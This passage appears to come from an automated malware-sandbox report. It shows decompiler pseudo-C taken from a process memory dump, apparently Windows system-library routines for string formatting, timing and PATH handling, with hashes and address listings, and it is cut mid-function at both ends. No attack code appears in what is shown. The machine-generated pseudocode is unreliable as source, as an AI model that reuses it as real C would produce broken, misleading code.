                                                                              					__eflags = 0;
                                                                              					while(1) {
                                                                              						__eflags = _t95 - 0x200;
                                                                              						if(_t95 >= 0x200) {
                                                                              							break;
                                                                              						}
                                                                              						E0177D000(0x80);
                                                                              						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                              						_t108 = _t115;
                                                                              						_t95 = _t95 - 0xffffff80;
                                                                              						_t17 = _t114 - 4;
                                                                              						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                              						__eflags =  *_t17;
                                                                              						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                              						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                              						_t102 = _t110 + 1;
                                                                              						do {
                                                                              							_t85 =  *_t110;
                                                                              							_t110 = _t110 + 1;
                                                                              							__eflags = _t85;
                                                                              						} while (_t85 != 0);
                                                                              						_t111 = _t110 - _t102;
                                                                              						_t21 = _t95 - 1; // -129
                                                                              						_t86 = _t21;
                                                                              						__eflags = _t111 - _t86;
                                                                              						if(_t111 > _t86) {
                                                                              							_t111 = _t86;
                                                                              						}
                                                                              						E0177F3E0(_t108, _t106, _t111);
                                                                              						_t115 = _t115 + 0xc;
                                                                              						_t103 = _t111 + _t108;
                                                                              						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                              						_t89 = _t95 - _t111;
                                                                              						__eflags = _t89;
                                                                              						_push(0);
                                                                              						if(_t89 == 0) {
                                                                              							L15:
                                                                              							_t109 = 0xc000000d;
                                                                              							goto L16;
                                                                              						} else {
                                                                              							__eflags = _t89 - 0x7fffffff;
                                                                              							if(_t89 <= 0x7fffffff) {
                                                                              								L16:
                                                                              								 *(_t114 - 0x94) = _t109;
                                                                              								__eflags = _t109;
                                                                              								if(_t109 < 0) {
                                                                              									__eflags = _t89;
                                                                              									if(_t89 != 0) {
                                                                              										 *_t103 = 0;
                                                                              									}
                                                                              									L26:
                                                                              									 *(_t114 - 0xa0) = _t109;
                                                                              									 *(_t114 - 4) = 0xfffffffe;
                                                                              									__eflags = _t109;
                                                                              									if(_t109 >= 0) {
                                                                              										L31:
                                                                              										_t98 = _t108;
                                                                              										_t39 = _t98 + 1; // 0x1
                                                                              										_t106 = _t39;
                                                                              										do {
                                                                              											_t69 =  *_t98;
                                                                              											_t98 = _t98 + 1;
                                                                              											__eflags = _t69;
                                                                              										} while (_t69 != 0);
                                                                              										_t99 = _t98 - _t106;
                                                                              										__eflags = _t99;
                                                                              										L34:
                                                                              										_t70 =  *[fs:0x30];
                                                                              										__eflags =  *((char*)(_t70 + 2));
                                                                              										if( *((char*)(_t70 + 2)) != 0) {
                                                                              											L40:
                                                                              											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                              											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                              											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                              											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                              											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                              											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                              											 *(_t114 - 4) = 1;
                                                                              											_push(_t114 - 0x74);
                                                                              											L0178DEF0(_t99, _t106);
                                                                              											 *(_t114 - 4) = 0xfffffffe;
                                                                              											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                              											goto L3;
                                                                              										}
                                                                              										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                              										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                              											goto L40;
                                                                              										}
                                                                              										_push( *((intOrPtr*)(_t114 + 8)));
                                                                              										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                              										_push(_t99 & 0x0000ffff);
                                                                              										_push(_t108);
                                                                              										_push(1);
                                                                              										_t101 = E0177B280();
                                                                              										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                              										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                              											__eflags = _t101 - 0x80000003;
                                                                              											if(_t101 == 0x80000003) {
                                                                              												E0177B7E0(1);
                                                                              												_t101 = 0;
                                                                              												__eflags = 0;
                                                                              											}
                                                                              										}
                                                                              										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                              										goto L4;
                                                                              									}
                                                                              									__eflags = _t109 - 0x80000005;
                                                                              									if(_t109 == 0x80000005) {
                                                                              										continue;
                                                                              									}
                                                                              									break;
                                                                              								}
                                                                              								 *(_t114 - 0x90) = 0;
                                                                              								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                              								_t91 = E0177E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                              								_t115 = _t115 + 0x10;
                                                                              								_t104 = _t91;
                                                                              								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                              								__eflags = _t104;
                                                                              								if(_t104 < 0) {
                                                                              									L21:
                                                                              									_t109 = 0x80000005;
                                                                              									 *(_t114 - 0x90) = 0x80000005;
                                                                              									L22:
                                                                              									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                              									L23:
                                                                              									 *(_t114 - 0x94) = _t109;
                                                                              									goto L26;
                                                                              								}
                                                                              								__eflags = _t104 - _t92;
                                                                              								if(__eflags > 0) {
                                                                              									goto L21;
                                                                              								}
                                                                              								if(__eflags == 0) {
                                                                              									goto L22;
                                                                              								}
                                                                              								goto L23;
                                                                              							}
                                                                              							goto L15;
                                                                              						}
                                                                              					}
                                                                              					__eflags = _t109;
                                                                              					if(_t109 >= 0) {
                                                                              						goto L31;
                                                                              					}
                                                                              					__eflags = _t109 - 0x80000005;
                                                                              					if(_t109 != 0x80000005) {
                                                                              						goto L31;
                                                                              					}
                                                                              					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                              					_t38 = _t95 - 1; // -129
                                                                              					_t99 = _t38;
                                                                              					goto L34;
                                                                              				}
                                                                              				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                              					__eflags = __edx - 0x65;
                                                                              					if(__edx != 0x65) {
                                                                              						goto L2;
                                                                              					}
                                                                              					goto L6;
                                                                              				}
                                                                              				L2:
                                                                              				_push( *((intOrPtr*)(_t114 + 8)));
                                                                              				_push(_t106);
                                                                              				if(E0177A890() != 0) {
                                                                              					goto L6;
                                                                              				}
                                                                              				goto L3;
                                                                              			}






















                                                                              0x017948e7
                                                                              0x017948e7
                                                                              0x017948ed
                                                                              0x017948f4
                                                                              0x017948f6
                                                                              0x01794951
                                                                              0x01794951
                                                                              0x01794953
                                                                              0x01794953
                                                                              0x01794956
                                                                              0x01794956
                                                                              0x01794958
                                                                              0x01794959
                                                                              0x01794959
                                                                              0x0179495d
                                                                              0x0179495d
                                                                              0x0179495f
                                                                              0x0179495f
                                                                              0x01794965
                                                                              0x01794969
                                                                              0x017949ba
                                                                              0x017949ba
                                                                              0x017949c1
                                                                              0x017949c5
                                                                              0x017949cc
                                                                              0x017949d4
                                                                              0x017949d7
                                                                              0x017949da
                                                                              0x017949e4
                                                                              0x017949e5
                                                                              0x017949f3
                                                                              0x01794a02
                                                                              0x00000000
                                                                              0x01794a02
                                                                              0x01794972
                                                                              0x01794974
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794976
                                                                              0x01794979
                                                                              0x01794982
                                                                              0x01794983
                                                                              0x01794984
                                                                              0x0179498b
                                                                              0x0179498d
                                                                              0x01794991
                                                                              0x01794993
                                                                              0x01794999
                                                                              0x0179499d
                                                                              0x017949a2
                                                                              0x017949a2
                                                                              0x017949a2
                                                                              0x01794999
                                                                              0x017949ac
                                                                              0x00000000
                                                                              0x017949b3
                                                                              0x017948f8
                                                                              0x017948fe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017948fe
                                                                              0x01794895
                                                                              0x0179489c
                                                                              0x017948ad
                                                                              0x017948b2
                                                                              0x017948b5
                                                                              0x017948b7
                                                                              0x017948ba
                                                                              0x017948bc
                                                                              0x017948c6
                                                                              0x017948c6
                                                                              0x017948cb
                                                                              0x017948d1
                                                                              0x017948d4
                                                                              0x017948d8
                                                                              0x017948d8
                                                                              0x00000000
                                                                              0x017948d8
                                                                              0x017948be
                                                                              0x017948c0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017948c2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017948c4
                                                                              0x00000000
                                                                              0x01794882
                                                                              0x0179487b
                                                                              0x01794904
                                                                              0x01794906
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794908
                                                                              0x0179490e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01794910
                                                                              0x01794917
                                                                              0x01794917
                                                                              0x00000000
                                                                              0x01794917
                                                                              0x0173b1ba
                                                                              0x017947f9
                                                                              0x017947fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017947fc
                                                                              0x0173b1c0
                                                                              0x0173b1c0
                                                                              0x0173b1c3
                                                                              0x0173b1cb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _vswprintf_s
                                                                              • String ID:
                                                                              • API String ID: 677850445-0
                                                                              • Opcode ID: 161aabed350bbe58c002f4f310d93306829025ca2ef7860368a0537b39af7428
                                                                              • Instruction ID: 1b26aff647abe7cc315bcd2716ab930288204801cac0d8a805b94d6f25666822
                                                                              • Opcode Fuzzy Hash: 161aabed350bbe58c002f4f310d93306829025ca2ef7860368a0537b39af7428
                                                                              • Instruction Fuzzy Hash: 1B51D071D002598EEF31CF68DA45BBEFBB0BF04724F1041ADD85AAB286D774494ACB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 76%
                                                                              			E0175B944(signed int* __ecx, char __edx) {
                                                                              				signed int _v8;
                                                                              				signed int _v16;
                                                                              				signed int _v20;
                                                                              				char _v28;
                                                                              				signed int _v32;
                                                                              				char _v36;
                                                                              				signed int _v40;
                                                                              				intOrPtr _v44;
                                                                              				signed int* _v48;
                                                                              				signed int _v52;
                                                                              				signed int _v56;
                                                                              				intOrPtr _v60;
                                                                              				intOrPtr _v64;
                                                                              				intOrPtr _v68;
                                                                              				intOrPtr _v72;
                                                                              				intOrPtr _v76;
                                                                              				char _v77;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				void* __esi;
                                                                              				intOrPtr* _t65;
                                                                              				intOrPtr _t67;
                                                                              				intOrPtr _t68;
                                                                              				char* _t73;
                                                                              				intOrPtr _t77;
                                                                              				intOrPtr _t78;
                                                                              				signed int _t82;
                                                                              				intOrPtr _t83;
                                                                              				void* _t87;
                                                                              				char _t88;
                                                                              				intOrPtr* _t89;
                                                                              				intOrPtr _t91;
                                                                              				void* _t97;
                                                                              				intOrPtr _t100;
                                                                              				void* _t102;
                                                                              				void* _t107;
                                                                              				signed int _t108;
                                                                              				intOrPtr* _t112;
                                                                              				void* _t113;
                                                                              				intOrPtr* _t114;
                                                                              				intOrPtr _t115;
                                                                              				intOrPtr _t116;
                                                                              				intOrPtr _t117;
                                                                              				signed int _t118;
                                                                              				void* _t130;
                                                                              
                                                                              				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                              				_v8 =  *0x182d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                              				_t112 = __ecx;
                                                                              				_v77 = __edx;
                                                                              				_v48 = __ecx;
                                                                              				_v28 = 0;
                                                                              				_t5 = _t112 + 0xc; // 0x575651ff
                                                                              				_t105 =  *_t5;
                                                                              				_v20 = 0;
                                                                              				_v16 = 0;
                                                                              				if(_t105 == 0) {
                                                                              					_t50 = _t112 + 4; // 0x5de58b5b
                                                                              					_t60 =  *__ecx |  *_t50;
                                                                              					if(( *__ecx |  *_t50) != 0) {
                                                                              						 *__ecx = 0;
                                                                              						__ecx[1] = 0;
                                                                              						if(E01757D50() != 0) {
                                                                              							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                              						} else {
                                                                              							_t65 = 0x7ffe0386;
                                                                              						}
                                                                              						if( *_t65 != 0) {
                                                                              							E01808CD6(_t112);
                                                                              						}
                                                                              						_push(0);
                                                                              						_t52 = _t112 + 0x10; // 0x778df98b
                                                                              						_push( *_t52);
                                                                              						_t60 = E01779E20();
                                                                              					}
                                                                              					L20:
                                                                              					_pop(_t107);
                                                                              					_pop(_t113);
                                                                              					_pop(_t87);
                                                                              					return E0177B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                              				}
                                                                              				_t8 = _t112 + 8; // 0x8b000cc2
                                                                              				_t67 =  *_t8;
                                                                              				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                              				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                              				_t108 =  *(_t67 + 0x14);
                                                                              				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                              				_t105 = 0x2710;
                                                                              				asm("sbb eax, edi");
                                                                              				_v44 = _t88;
                                                                              				_v52 = _t108;
                                                                              				_t60 = E0177CE00(_t97, _t68, 0x2710, 0);
                                                                              				_v56 = _t60;
                                                                              				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                              					L3:
                                                                              					 *(_t112 + 0x44) = _t60;
                                                                              					_t105 = _t60 * 0x2710 >> 0x20;
                                                                              					 *_t112 = _t88;
                                                                              					 *(_t112 + 4) = _t108;
                                                                              					_v20 = _t60 * 0x2710;
                                                                              					_v16 = _t60 * 0x2710 >> 0x20;
                                                                              					if(_v77 != 0) {
                                                                              						L16:
                                                                              						_v36 = _t88;
                                                                              						_v32 = _t108;
                                                                              						if(E01757D50() != 0) {
                                                                              							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                              						} else {
                                                                              							_t73 = 0x7ffe0386;
                                                                              						}
                                                                              						if( *_t73 != 0) {
                                                                              							_t105 = _v40;
                                                                              							E01808F6A(_t112, _v40, _t88, _t108);
                                                                              						}
                                                                              						_push( &_v28);
                                                                              						_push(0);
                                                                              						_push( &_v36);
                                                                              						_t48 = _t112 + 0x10; // 0x778df98b
                                                                              						_push( *_t48);
                                                                              						_t60 = E0177AF60();
                                                                              						goto L20;
                                                                              					} else {
                                                                              						_t89 = 0x7ffe03b0;
                                                                              						do {
                                                                              							_t114 = 0x7ffe0010;
                                                                              							do {
                                                                              								_t77 =  *0x1828628; // 0x0
                                                                              								_v68 = _t77;
                                                                              								_t78 =  *0x182862c; // 0x0
                                                                              								_v64 = _t78;
                                                                              								_v72 =  *_t89;
                                                                              								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                              								while(1) {
                                                                              									_t105 =  *0x7ffe000c;
                                                                              									_t100 =  *0x7ffe0008;
                                                                              									if(_t105 ==  *_t114) {
                                                                              										goto L8;
                                                                              									}
                                                                              									asm("pause");
                                                                              								}
                                                                              								L8:
                                                                              								_t89 = 0x7ffe03b0;
                                                                              								_t115 =  *0x7ffe03b0;
                                                                              								_t82 =  *0x7FFE03B4;
                                                                              								_v60 = _t115;
                                                                              								_t114 = 0x7ffe0010;
                                                                              								_v56 = _t82;
                                                                              							} while (_v72 != _t115 || _v76 != _t82);
                                                                              							_t83 =  *0x1828628; // 0x0
                                                                              							_t116 =  *0x182862c; // 0x0
                                                                              							_v76 = _t116;
                                                                              							_t117 = _v68;
                                                                              						} while (_t117 != _t83 || _v64 != _v76);
                                                                              						asm("sbb edx, [esp+0x24]");
                                                                              						_t102 = _t100 - _v60 - _t117;
                                                                              						_t112 = _v48;
                                                                              						_t91 = _v44;
                                                                              						asm("sbb edx, eax");
                                                                              						_t130 = _t105 - _v52;
                                                                              						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                              							_t88 = _t102 - _t91;
                                                                              							asm("sbb edx, edi");
                                                                              							_t108 = _t105;
                                                                              						} else {
                                                                              							_t88 = 0;
                                                                              							_t108 = 0;
                                                                              						}
                                                                              						goto L16;
                                                                              					}
                                                                              				} else {
                                                                              					if( *(_t112 + 0x44) == _t60) {
                                                                              						goto L20;
                                                                              					}
                                                                              					goto L3;
                                                                              				}
                                                                              			}


                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0175B9A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID:
                                                                              • API String ID: 885266447-0
                                                                              • Opcode ID: 9b5b18fb06fc99bf4def84c7e2071232cd49a3d10253c7faa725bf4f3632a49b
                                                                              • Instruction ID: 2a74dec0e982dd4f5065e1a3f178642d08ce6a33d6d8a91ab6936bfeb7b23554
                                                                              • Opcode Fuzzy Hash: 9b5b18fb06fc99bf4def84c7e2071232cd49a3d10253c7faa725bf4f3632a49b
                                                                              • Instruction Fuzzy Hash: CA515771A08341CFC761CF68C48492AFBF6FB88610F54896EFA8587359D7B0E944CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 86%
                                                                              			E01762581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, void* _a12, void* _a16, void* _a20, void* _a24) {
                                                                              				signed int _v8;
                                                                              				signed int _v16;
                                                                              				unsigned int _v24;
                                                                              				void* _v28;
                                                                              				signed int _v32;
                                                                              				unsigned int _v36;
                                                                              				signed int _v37;
                                                                              				void* _v40;
                                                                              				signed int _v44;
                                                                              				signed int _v48;
                                                                              				signed int _v52;
                                                                              				signed int _v56;
                                                                              				intOrPtr _v60;
                                                                              				signed int _v64;
                                                                              				signed int _v68;
                                                                              				signed int _v72;
                                                                              				signed int _v76;
                                                                              				signed int _v80;
                                                                              				signed int _t240;
                                                                              				signed int _t244;
                                                                              				signed int _t245;
                                                                              				signed int _t246;
                                                                              				signed int _t275;
                                                                              				intOrPtr _t281;
                                                                              				signed int _t283;
                                                                              				signed int _t285;
                                                                              				unsigned int _t291;
                                                                              				signed int _t295;
                                                                              				signed int _t322;
                                                                              				signed int _t324;
                                                                              				signed int _t329;
                                                                              				signed int _t330;
                                                                              				signed int _t332;
                                                                              				void* _t333;
                                                                              				signed int _t336;
                                                                              				signed int _t339;
                                                                              				signed int _t340;
                                                                              
                                                                              				_t336 = _t339;
                                                                              				_t340 = _t339 - 0x4c;
                                                                              				_v8 =  *0x182d360 ^ _t336;
                                                                              				_t329 = 0x182b2e8;
                                                                              				_v56 = _a4;
                                                                              				_v48 = __edx;
                                                                              				_v60 = __ecx;
                                                                              				_t291 = 0;
                                                                              				_v80 = 0;
                                                                              				asm("movsd");
                                                                              				_v64 = 0;
                                                                              				_v76 = 0;
                                                                              				_v72 = 0;
                                                                              				asm("movsd");
                                                                              				_v44 = 0;
                                                                              				_v52 = 0;
                                                                              				_v68 = 0;
                                                                              				asm("movsd");
                                                                              				_v32 = 0;
                                                                              				_v36 = 0;
                                                                              				asm("movsd");
                                                                              				_v16 = 0;
                                                                              				_t281 = 0x48;
                                                                              				_t311 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                              				_t322 = 0;
                                                                              				_v37 = _t311;
                                                                              				if(_v48 <= 0) {
                                                                              					L16:
                                                                              					_t45 = _t281 - 0x48; // 0x0
                                                                              					__eflags = _t45 - 0xfffe;
                                                                              					if(_t45 > 0xfffe) {
                                                                              						_t330 = 0xc0000106;
                                                                              						goto L32;
                                                                              					} else {
                                                                              						_t329 = L01754620(_t291,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
                                                                              						_v52 = _t329;
                                                                              						__eflags = _t329;
                                                                              						if(_t329 == 0) {
                                                                              							_t330 = 0xc0000017;
                                                                              							goto L32;
                                                                              						} else {
                                                                              							 *(_t329 + 0x44) =  *(_t329 + 0x44) & 0x00000000;
                                                                              							_t50 = _t329 + 0x48; // 0x48
                                                                              							_t324 = _t50;
                                                                              							_t311 = _v32;
                                                                              							 *((intOrPtr*)(_t329 + 0x3c)) = _t281;
                                                                              							_t283 = 0;
                                                                              							 *((short*)(_t329 + 0x30)) = _v48;
                                                                              							__eflags = _t311;
                                                                              							if(_t311 != 0) {
                                                                              								 *(_t329 + 0x18) = _t324;
                                                                              								__eflags = _t311 - 0x1828478;
                                                                              								 *_t329 = ((0 | _t311 == 0x01828478) - 0x00000001 & 0xfffffffb) + 7;
                                                                              								E0177F3E0(_t324,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
                                                                              								_t311 = _v32;
                                                                              								_t340 = _t340 + 0xc;
                                                                              								_t283 = 1;
                                                                              								__eflags = _a8;
                                                                              								_t324 = _t324 + (( *_t311 & 0x0000ffff) >> 1) * 2;
                                                                              								if(_a8 != 0) {
                                                                              									_t275 = E017C39F2(_t324);
                                                                              									_t311 = _v32;
                                                                              									_t324 = _t275;
                                                                              								}
                                                                              							}
                                                                              							_t295 = 0;
                                                                              							_v16 = 0;
                                                                              							__eflags = _v48;
                                                                              							if(_v48 <= 0) {
                                                                              								L31:
                                                                              								_t330 = _v68;
                                                                              								__eflags = 0;
                                                                              								 *((short*)(_t324 - 2)) = 0;
                                                                              								goto L32;
                                                                              							} else {
                                                                              								_t285 = _t329 + _t283 * 4;
                                                                              								_v56 = _t285;
                                                                              								do {
                                                                              									__eflags = _t311;
                                                                              									if(_t311 != 0) {
                                                                              										_t240 =  *(_v60 + _t295 * 4);
                                                                              										__eflags = _t240;
                                                                              										if(_t240 == 0) {
                                                                              											goto L30;
                                                                              										} else {
                                                                              											__eflags = _t240 == 5;
                                                                              											if(_t240 == 5) {
                                                                              												goto L30;
                                                                              											} else {
                                                                              												goto L22;
                                                                              											}
                                                                              										}
                                                                              									} else {
                                                                              										L22:
                                                                              										 *_t285 =  *(_v60 + _t295 * 4);
                                                                              										 *(_t285 + 0x18) = _t324;
                                                                              										_t244 =  *(_v60 + _t295 * 4);
                                                                              										__eflags = _t244 - 8;
                                                                              										if(__eflags > 0) {
                                                                              											goto L56;
                                                                              										} else {
                                                                              											switch( *((intOrPtr*)(_t244 * 4 +  &M01762959))) {
                                                                              												case 0:
                                                                              													__ax =  *0x1828488;
                                                                              													__eflags = __ax;
                                                                              													if(__ax == 0) {
                                                                              														goto L29;
                                                                              													} else {
                                                                              														__ax & 0x0000ffff = E0177F3E0(__edi,  *0x182848c, __ax & 0x0000ffff);
                                                                              														__eax =  *0x1828488 & 0x0000ffff;
                                                                              														goto L26;
                                                                              													}
                                                                              													goto L126;
                                                                              												case 1:
                                                                              													L45:
                                                                              													E0177F3E0(_t324, _v80, _v64);
                                                                              													_t270 = _v64;
                                                                              													goto L26;
                                                                              												case 2:
                                                                              													 *0x1828480 & 0x0000ffff = E0177F3E0(__edi,  *0x1828484,  *0x1828480 & 0x0000ffff);
                                                                              													__eax =  *0x1828480 & 0x0000ffff;
                                                                              													__eax = ( *0x1828480 & 0x0000ffff) >> 1;
                                                                              													__edi = __edi + __eax * 2;
                                                                              													goto L28;
                                                                              												case 3:
                                                                              													__eax = _v44;
                                                                              													__eflags = __eax;
                                                                              													if(__eax == 0) {
                                                                              														goto L29;
                                                                              													} else {
                                                                              														__esi = __eax + __eax;
                                                                              														__eax = E0177F3E0(__edi, _v72, __esi);
                                                                              														__edi = __edi + __esi;
                                                                              														__esi = _v52;
                                                                              														goto L27;
                                                                              													}
                                                                              													goto L126;
                                                                              												case 4:
                                                                              													_push(0x2e);
                                                                              													_pop(__eax);
                                                                              													 *(__esi + 0x44) = __edi;
                                                                              													 *__edi = __ax;
                                                                              													__edi = __edi + 4;
                                                                              													_push(0x3b);
                                                                              													_pop(__eax);
                                                                              													 *(__edi - 2) = __ax;
                                                                              													goto L29;
                                                                              												case 5:
                                                                              													__eflags = _v36;
                                                                              													if(_v36 == 0) {
                                                                              														goto L45;
                                                                              													} else {
                                                                              														E0177F3E0(_t324, _v76, _v36);
                                                                              														_t270 = _v36;
                                                                              													}
                                                                              													L26:
                                                                              													_t340 = _t340 + 0xc;
                                                                              													_t324 = _t324 + (_t270 >> 1) * 2 + 2;
                                                                              													__eflags = _t324;
                                                                              													L27:
                                                                              													_push(0x3b);
                                                                              													_pop(_t272);
                                                                              													 *((short*)(_t324 - 2)) = _t272;
                                                                              													goto L28;
                                                                              												case 6:
                                                                              													__ebx =  *0x182575c;
                                                                              													__eflags = __ebx - 0x182575c;
                                                                              													if(__ebx != 0x182575c) {
                                                                              														_push(0x3b);
                                                                              														_pop(__esi);
                                                                              														do {
                                                                              															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                              															E0177F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                              															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                              															__edi = __edi + __eax * 2;
                                                                              															__edi = __edi + 2;
                                                                              															 *(__edi - 2) = __si;
                                                                              															__ebx =  *__ebx;
                                                                              															__eflags = __ebx - 0x182575c;
                                                                              														} while (__ebx != 0x182575c);
                                                                              														__esi = _v52;
                                                                              														__ecx = _v16;
                                                                              														__edx = _v32;
                                                                              													}
                                                                              													__ebx = _v56;
                                                                              													goto L29;
                                                                              												case 7:
                                                                              													 *0x1828478 & 0x0000ffff = E0177F3E0(__edi,  *0x182847c,  *0x1828478 & 0x0000ffff);
                                                                              													__eax =  *0x1828478 & 0x0000ffff;
                                                                              													__eax = ( *0x1828478 & 0x0000ffff) >> 1;
                                                                              													__eflags = _a8;
                                                                              													__edi = __edi + __eax * 2;
                                                                              													if(_a8 != 0) {
                                                                              														__ecx = __edi;
                                                                              														__eax = E017C39F2(__ecx);
                                                                              														__edi = __eax;
                                                                              													}
                                                                              													goto L28;
                                                                              												case 8:
                                                                              													__eax = 0;
                                                                              													 *(__edi - 2) = __ax;
                                                                              													 *0x1826e58 & 0x0000ffff = E0177F3E0(__edi,  *0x1826e5c,  *0x1826e58 & 0x0000ffff);
                                                                              													 *(__esi + 0x38) = __edi;
                                                                              													__eax =  *0x1826e58 & 0x0000ffff;
                                                                              													__eax = ( *0x1826e58 & 0x0000ffff) >> 1;
                                                                              													__edi = __edi + __eax * 2;
                                                                              													__edi = __edi + 2;
                                                                              													L28:
                                                                              													_t295 = _v16;
                                                                              													_t311 = _v32;
                                                                              													L29:
                                                                              													_t285 = _t285 + 4;
                                                                              													__eflags = _t285;
                                                                              													_v56 = _t285;
                                                                              													goto L30;
                                                                              											}
                                                                              										}
                                                                              									}
                                                                              									goto L126;
                                                                              									L30:
                                                                              									_t295 = _t295 + 1;
                                                                              									_v16 = _t295;
                                                                              									__eflags = _t295 - _v48;
                                                                              								} while (_t295 < _v48);
                                                                              								goto L31;
                                                                              							}
                                                                              						}
                                                                              					}
                                                                              				} else {
                                                                              					while(1) {
                                                                              						L1:
                                                                              						_t244 =  *(_v60 + _t322 * 4);
                                                                              						if(_t244 > 8) {
                                                                              							break;
                                                                              						}
                                                                              						switch( *((intOrPtr*)(_t244 * 4 +  &M01762935))) {
                                                                              							case 0:
                                                                              								__ax =  *0x1828488;
                                                                              								__eflags = __ax;
                                                                              								if(__eflags != 0) {
                                                                              									__eax = __ax & 0x0000ffff;
                                                                              									__ebx = __ebx + 2;
                                                                              									__eflags = __ebx;
                                                                              									goto L53;
                                                                              								}
                                                                              								goto L14;
                                                                              							case 1:
                                                                              								L44:
                                                                              								_t311 =  &_v64;
                                                                              								_v80 = E01762E3E(0,  &_v64);
                                                                              								_t281 = _t281 + _v64 + 2;
                                                                              								goto L13;
                                                                              							case 2:
                                                                              								__eax =  *0x1828480 & 0x0000ffff;
                                                                              								__ebx = __ebx + __eax;
                                                                              								__eflags = __dl;
                                                                              								if(__eflags != 0) {
                                                                              									__eax = 0x1828480;
                                                                              									goto L98;
                                                                              								}
                                                                              								goto L14;
                                                                              							case 3:
                                                                              								__eax = E0174EEF0(0x18279a0);
                                                                              								__eax =  &_v44;
                                                                              								_push(__eax);
                                                                              								_push(0);
                                                                              								_push(0);
                                                                              								_push(4);
                                                                              								_push(L"PATH");
                                                                              								_push(0);
                                                                              								L75();
                                                                              								__esi = __eax;
                                                                              								_v68 = __esi;
                                                                              								__eflags = __esi - 0xc0000023;
                                                                              								if(__esi != 0xc0000023) {
                                                                              									L10:
                                                                              									__eax = E0174EB70(__ecx, 0x18279a0);
                                                                              									__eflags = __esi - 0xc0000100;
                                                                              									if(__eflags == 0) {
                                                                              										_v44 = _v44 & 0x00000000;
                                                                              										__eax = 0;
                                                                              										_v68 = 0;
                                                                              										goto L13;
                                                                              									} else {
                                                                              										__eflags = __esi;
                                                                              										if(__esi < 0) {
                                                                              											L32:
                                                                              											_t218 = _v72;
                                                                              											__eflags = _t218;
                                                                              											if(_t218 != 0) {
                                                                              												L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                                              											}
                                                                              											_t219 = _v52;
                                                                              											__eflags = _t219;
                                                                              											if(_t219 != 0) {
                                                                              												__eflags = _t330;
                                                                              												if(_t330 < 0) {
                                                                              													L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
